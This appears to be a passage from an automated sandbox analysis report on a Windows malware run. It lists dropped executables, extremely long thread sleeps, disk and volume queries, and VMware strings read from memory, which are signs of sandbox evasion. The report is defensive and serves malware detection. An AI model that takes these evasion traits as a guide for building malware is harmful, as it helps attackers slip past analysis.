                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4850Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5010Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3982Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 5750Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1593
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 423
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\wPxPcov2_iRQt91bGzfyQLn0.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\IzXa7ArplEUILx8JLGVvIms1.exeJump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeDropped PE file which has not been started: C:\Users\user\Pictures\360TS_Setup.exe (copy)Jump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\crt[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\7uuYOubuRuTeu2Z5aoCcHRqr.exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\bash.exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\notepad.exeJump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeDropped PE file which has not been started: C:\Users\user\Pictures\360TS_Setup.exe.P2PJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\1j9R8lifNJQPOos8jChy96bC.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\8uJfLKd9Ss22grd4NZfs8ESc.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\sCKRGnz9ufcbydLPdvMHEgfk.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\auditpol.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\Vv3eq95tJE23PC8aGlGuTOwU.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup294[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\0xzSXfvcS_VEarTqOdaPs4ts.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\o2i3jroi23joj23ikrjokij3oroi[1].exeJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ED0F.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\949yVhltZoP9AEITjUlYclGY.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\3jK_1xVb8VV_A9ZblPqH0VLP.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\OZYSp_SuS64TdEhCce9XJabD.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\iWX2pBM7OP8AKRlxpYxKCjxp.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\JJ5skLlHHCJQmKA3fqFEF8WX.exeJump to dropped file
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\atieah64.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\rKeuCT5BtcDJi3xnRhdYBXJ0.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\timeSync[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\xCrl2X_yjihZJLjlfNXcaGsm.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\GLt6qc3E5xlMIXJ9xyvvME0a.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\niko[1].exeJump to dropped file
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{F0567900-3BBD-4439-A130-BA90A759BDE5}.tmp\360P2SP.dllJump to dropped file
                  Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FFE8.exeJump to dropped file
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exeJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7188Thread sleep count: 3982 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599889s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7188Thread sleep count: 5750 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599775s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599671s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599450s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599336s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599124s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -599015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -598906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -598789s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -598656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -598527s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -598420s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -598312s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -598093s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597982s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597547s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597328s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597218s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -597109s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -596926s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -596757s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -596655s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -596529s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -596265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -596122s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -596000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595669s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595118s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -595013s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7132Thread sleep time: -300000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -594906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -594787s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -594655s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -594544s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -594437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -594265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -594108s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -594000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -593885s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5448Thread sleep time: -593781s >= -30000sJump to behavior
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8652Thread sleep count: 298 > 30
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8652Thread sleep time: -59600s >= -30000s
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 7988Thread sleep time: -300000s >= -30000s
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe TID: 8696Thread sleep time: -300000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 1593 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940Thread sleep count: 103 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8384Thread sleep count: 423 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8636Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_0040553A FindFirstFileA,18_2_0040553A
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeCode function: 18_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,18_2_004055DE
                  Source: C:\Users\user\Desktop\lgX7lgUL1w.exeCode function: 0_2_00007FF7E35824C0 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF7E35824C0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599889Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599775Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599450Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599336Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598789Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598527Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598420Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597982Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597218Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596926Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596757Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596529Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596122Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595669Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595118Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595013Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594787Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594544Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594108Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593885Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593781Jump to behavior
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeThread delayed: delay time: 300000
                  Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exeThread delayed: delay time: 300000
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\Local\Temp\
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\Local\
                  Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exeFile opened: C:\Users\user~1\AppData\
                  Source: explorer.exe, 00000024.00000000.1321857063.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
                  Source: explorer.exe, 00000024.00000000.1419179675.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: svchost.exe, 0000000D.00000002.2762397674.000001B899B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42
